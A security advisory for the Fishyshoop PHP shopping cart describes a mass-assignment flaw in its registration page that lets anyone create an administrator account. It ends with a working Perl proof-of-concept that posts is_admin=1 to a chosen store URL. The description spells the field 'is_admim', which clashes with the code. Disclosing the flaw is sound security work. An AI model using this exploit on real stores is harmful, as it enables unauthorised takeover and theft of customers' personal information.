fishyshoop-vuln.txt

`Synopsis  
========  
The Fishyshoop shopping cart software contains a vulnerability which  
allows arbitrary users to create accounts with administrator  
privileges  
  
Background  
==========  
Fishyshoop is a suite of PHP scripts allowing anybody to create an  
attractive online store.  
  
Affected Versions  
=================  
Verified on 0.930 beta. Previous versions may also be affected.  
  
Impact  
======  
The user gains administrator privileges in the software, meaning they  
are free to alter many aspects of the store, as well as committing  
theft of personal information belonging to other users of the store.  
  
Description  
===========  
pages/register/register.php takes every POST variable and inserts the  
value into a new record under a field with the same name. If a new  
registration is made with the variable is_admim set to 1, the account  
will have administrator privileges on the site.  
  
Proof of Concept  
================  
#!/usr/bin/perl  
  
use WWW::Curl::Easy;  
  
sub usage() {  
print "$0 <Fishyshoop root URL> <Desired E-Mail> <Desired Password>\n";  
exit();  
}  
  
$FSURL=shift or usage(); $UNAME=shift or usage(); $PASS=shift or usage();  
  
my $fishyshoop = new WWW::Curl::Easy;  
$fishyshoop->setopt(CURLOPT_URL, "$FSURL?L=register.register");  
$fishyshoop->setopt(CURLOPT_POST, 1);  
$fishyshoop->setopt(CURLOPT_POSTFIELDS,  
"email=$UNAME&password=$PASS&is_admin=1&submit=1");  
$fishyshoop->perform;  
`